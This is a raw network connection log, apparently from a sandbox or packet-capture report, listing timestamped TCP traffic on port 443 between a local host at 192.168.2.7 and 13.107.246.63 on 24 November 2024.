                                                                                                                                                                        Nov 24, 2024 05:12:37.385248899 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.385319948 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.385412931 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.385431051 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.385442972 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.385447979 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.388953924 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.389039040 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.389141083 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.389354944 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.389384031 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.450978994 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.454027891 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.454083920 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.454139948 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.454154015 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.454168081 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.454173088 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.459122896 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.459178925 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.459254980 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.459722042 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.459733963 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.526088953 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.529215097 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.529278040 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.529356956 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.529365063 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.529406071 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.529411077 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.532502890 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.532598972 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.532753944 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.533032894 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.533065081 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.536499023 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.539505959 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.539557934 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.539572954 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.539622068 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.539685011 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.539726973 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.539740086 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.539752007 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.539756060 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.543668985 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.543720007 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:37.543787003 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.544043064 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:37.544058084 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:38.849590063 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:38.850290060 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:38.850317001 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:38.850920916 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:38.850925922 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.176450968 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.177565098 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.177611113 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.178275108 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.178289890 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.284115076 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.287059069 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.287126064 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.287178040 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.287214994 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.287276030 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.287377119 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.287408113 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.287453890 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.287470102 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.292042971 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.292100906 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.292186975 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.292383909 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.292403936 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.312163115 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.312673092 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.312704086 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.313167095 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.313173056 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.315511942 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.315853119 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.315886021 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.316214085 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.316224098 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.337533951 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.338171005 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.338202000 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.338597059 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.338606119 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.622169018 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.622272015 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.622334957 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.622586012 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.622608900 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.622627020 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.622633934 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.626216888 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.626271963 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.626352072 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.626575947 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.626593113 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.757505894 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.760550022 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.760665894 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.760760069 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.760760069 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.760808945 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.760835886 CET4435002213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.764108896 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.764205933 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.764331102 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.764545918 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.764581919 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.765012980 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.768098116 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.768141985 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.768152952 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.768204927 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.768270016 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.768285990 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.768299103 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.768304110 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.770777941 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.770833015 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.770911932 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.771071911 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.771087885 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.779655933 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.782742977 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.782809019 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.782869101 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.782881021 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.782893896 CET50023443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.782897949 CET4435002313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.785130024 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.785164118 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:39.785233974 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.785377026 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:39.785387993 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.074021101 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.074840069 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.074872017 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.075249910 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.075261116 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.410748959 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.411509037 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.411520958 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.412149906 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.412157059 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.543965101 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.544645071 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.544686079 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.545135021 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.545140028 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.547770977 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.548135042 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.548166037 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.548537016 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.548543930 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.561479092 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.564560890 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.564619064 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.564726114 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.564745903 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.564755917 CET50024443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.564760923 CET4435002413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.569156885 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.569195032 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.569258928 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.569447041 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.569459915 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.633980036 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.634485960 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.634495974 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.634947062 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.634951115 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.856034994 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.859193087 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.859333038 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.859411001 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.859421015 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.859435081 CET50025443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.859441042 CET4435002513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.862817049 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.862868071 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.862960100 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.863096952 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.863107920 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.987184048 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.987260103 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.987327099 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.987549067 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.987577915 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.987587929 CET50026443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.987593889 CET4435002613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.991246939 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.991291046 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.991357088 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.991617918 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.991631985 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.992047071 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.995141983 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.995197058 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.995218992 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.995244026 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.995286942 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.995307922 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.995331049 CET50027443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.995338917 CET4435002713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.997451067 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.997473955 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:41.997549057 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.997679949 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:41.997694969 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:42.085184097 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:42.085277081 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:42.085325003 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:42.085520029 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:42.085541964 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:42.085555077 CET50028443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:42.085561037 CET4435002813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:42.088886976 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:42.088932991 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:42.089015007 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:42.089202881 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:42.089216948 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.354680061 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.355236053 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.355282068 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.355721951 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.355731010 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.659012079 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.659739971 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.659758091 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.660227060 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.660234928 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.715946913 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.716744900 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.716773987 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.717305899 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.717314005 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.772233009 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.772828102 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.772860050 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.773333073 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.773339033 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.798331976 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.801309109 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.801460028 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.801474094 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.801513910 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.801572084 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.801599026 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.801624060 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.801632881 CET50029443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.801640034 CET4435002913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.804508924 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.804552078 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.804668903 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.804833889 CET50034443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.804848909 CET4435003413.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.815877914 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.816386938 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.816438913 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:43.817018032 CET50033443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:43.817024946 CET4435003313.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.101051092 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.104213953 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.104310036 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.104378939 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.104408026 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.104417086 CET50030443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.104424953 CET4435003013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.108161926 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.108207941 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.108294010 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.108443975 CET50035443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.108458996 CET4435003513.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.149631977 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.152911901 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.153026104 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.153026104 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.153058052 CET50032443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.153084993 CET4435003213.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.155935049 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.155970097 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.156037092 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.156198025 CET50036443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.156205893 CET4435003613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.215756893 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.218772888 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.218822956 CET4435003113.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:44.218852043 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.218890905 CET50031443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:12:44.218960047 CET50031443192.168.2.713.107.246.63
